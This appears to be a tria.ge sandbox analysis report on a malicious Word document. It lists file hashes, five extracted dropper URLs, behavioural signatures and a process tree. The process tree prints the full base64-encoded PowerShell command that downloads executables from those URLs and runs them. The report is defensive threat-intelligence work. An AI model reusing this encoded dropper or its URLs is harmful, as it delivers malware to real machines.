Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/05/2024, 14:27

General

  • Target

    7d4a88e3197c77c0baaa1200d916a769_JaffaCakes118.doc

  • Size

    233KB

  • MD5

    7d4a88e3197c77c0baaa1200d916a769

  • SHA1

    bee5d88b478a9bbc3332eb8c3ee9b1cecfd9e88b

  • SHA256

    f954e89b36a77905275265bd2fb0d06598eac1367a986b8f882830b42b87b511

  • SHA512

    cbc9e32e2ead3872521e69bc093fe3f190d612c3d96dc86fb01bb68f86b3aa1d8692c1045be8da46f64a6ecf5ce21baf2742979e889a0b34003b3c7f7e82c7c8

  • SSDEEP

    3072:Ej6yw1MgpQiBhGWb6esLbTh8YuyDRBFtdfGk2B+8ymwaF+Rc:EHgtEWPsL/aTyT9Gk2BBymwaQRc

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://synologlogin.com/cgi-bin/ho_iewdm_x99w/

exe.dropper

http://tz005.com/aspnet_client/system_web/upao5_p_i/

exe.dropper

http://nucleokardecistalace.org.br/wp-includes/hnor_qz_n66fskbujg/

exe.dropper

http://m.hepingzyy120.com/mbsz/tg_h9_9tkc5xa2/

exe.dropper

http://identisoft.pt/istore/xz_nf_fql8v7nx/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 8 IoCs
  • Process spawned suspicious child process 1 IoCs

    This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7d4a88e3197c77c0baaa1200d916a769_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:668
    • C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE
      "C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DW20.EXE" -x -s 5076
      2⤵
      • Process spawned suspicious child process
      • Suspicious use of WriteProcessMemory
      PID:4884
      • C:\Windows\system32\dwwin.exe
        C:\Windows\system32\dwwin.exe -x -s 5076
        3⤵
        • Checks processor information in registry
        • Enumerates system info in registry
        PID:4360
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABSAGIAegBoAHgAZQB4AD0AJwBOAHkAOQAzADAANABoACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBgAEMAVQByAGkAVABZAGAAcAByAE8AdABPAGMAYABvAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABUAHUAbAB6AGMAeQB4ACAAPQAgACcAWgB3AHoAbQAnADsAJABSAHUAdgBhADIAXwBoAD0AJwBOAHgAcABsAG8AdwB3ACcAOwAkAFkAbgA4AGEAYQB2AG8APQAkAGUAbgB2ADoAdABlAG0AcAArACcAXAAnACsAJABUAHUAbAB6AGMAeQB4ACsAJwAuAGUAeABlACcAOwAkAEMAdAAzADUAMgBfAHIAPQAnAFEAdwAwADkAbgBtADQAJwA7ACQAVAB4AG8AcAB2AHYAdQA9ACYAKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAAbgBFAFQALgB3AEUAQgBjAEwAaQBlAG4AdAA7ACQAUABmADgAMAB1ADUAbQA9ACcAaAB0AHQAcAA6AC8ALwBzAHkAbgBvAGwAbwBnAGwAbwBnAGkAbgAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAGgAbwBfAGkAZQB3AGQAbQBfAHgAOQA5AHcALwAqAGgAdAB0AHAAOgAvAC8AdAB6ADAAMAA1AC4AYwBvAG0ALwBhAHMAcABuAGUAdABfAGMAbABpAGUAbgB0AC8AcwB5AHMAdABlAG0AXwB3AGUAYgAvAHUAcABhAG8ANQBfAHAAXwBpAC8AKgBoAHQAdABwADoALwAvAG4AdQBjAGwAZQBvAGsAYQByAGQAZQBjAGkAcwB0AGEAbABhAGMAZQAuAG8AcgBnAC4AYgByAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AaABuAG8AcgBfAHEAegBfAG4ANgA2AGYAcwBrAGIAdQBqAGcALwAqAGgAdAB0AHAAOgAvAC8AbQAuAGgAZQBwAGkAbgBnAHoAeQB5ADEAMgAwAC4AYwBvAG0ALwBtAGIAcwB6AC8AdABnAF8AaAA5AF8AOQB0AGsAYwA1AHgAYQAyAC8AKgBoAHQAdABwADoALwAvAGkAZABlAG4AdABpAHMAbwBmAHQALgBwAHQALwBpAHMAdABvAHIAZQAvAHgAegBfAG4AZgBfAGYAcQBsADgAdgA3AG4AeAAvACcALgAiAHMAUABMAGAASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARgBxAGMAZQByAHoAcgA9ACcAWQB5AG8AOABpAHgAbwAnADsAZgBvAHIAZQBhAGMAaAAoACQAWgBiAG0AagAwADMAMgAgAGkAbgAgACQAUABmADgAMAB1ADUAbQApAHsAdAByAHkAewAkAFQAeABvAHAAdgB2AHUALgAiAEQAYABvAHcAbgBsAGAAbwBBAEQAZgBgAEkAbABlACIAKAAkAFoAYgBtAGoAMAAzADIALAAgACQAWQBuADgAYQBhAHYAbwApADsAJABGAGsAOABtAGgAeQBxAD0AJwBDAGoAbwBlAGIAagB4ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAWQBuADgAYQBhAHYAbwApAC4AIgBMAGUATgBHAGAAVABIACIAIAAtAGcAZQAgADIAMwA0ADMANAApACAAewAuACgAJwBJAG4AdgBvAGsAZQAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACgAJABZAG4AOABhAGEAdgBvACkAOwAkAEkAZQAwAHUAcgBxAG8APQAnAEQAOABkAHYAdgBkAF8AJwA7AGIAcgBlAGEAawA7ACQAUQAyAGMAcQBxADgAdQA9ACcASgBiAGgAbABtAHYAeQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABGAGIAOAB0AHEANAAxAD0AJwBOAGsAYgAyAG4AZABzACcA
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:4928

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1g5cb4y4.3jo.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/668-22-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-3-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

    Filesize

    64KB

  • memory/668-1-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

    Filesize

    64KB

  • memory/668-5-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

    Filesize

    64KB

  • memory/668-4-0x00007FFBA07ED000-0x00007FFBA07EE000-memory.dmp

    Filesize

    4KB

  • memory/668-6-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-8-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-7-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-9-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-10-0x00007FFB5E600000-0x00007FFB5E610000-memory.dmp

    Filesize

    64KB

  • memory/668-11-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-16-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-15-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-14-0x00007FFB5E600000-0x00007FFB5E610000-memory.dmp

    Filesize

    64KB

  • memory/668-13-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-12-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-0-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

    Filesize

    64KB

  • memory/668-20-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-78-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-21-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-19-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-18-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-17-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-35-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-36-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-59-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-66-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-71-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-23-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-111-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

    Filesize

    2.0MB

  • memory/668-2-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

    Filesize

    64KB

  • memory/4884-107-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

    Filesize

    64KB

  • memory/4884-110-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

    Filesize

    64KB

  • memory/4884-109-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

    Filesize

    64KB

  • memory/4884-108-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

    Filesize

    64KB

  • memory/4928-92-0x0000020E74B50000-0x0000020E74B72000-memory.dmp

    Filesize

    136KB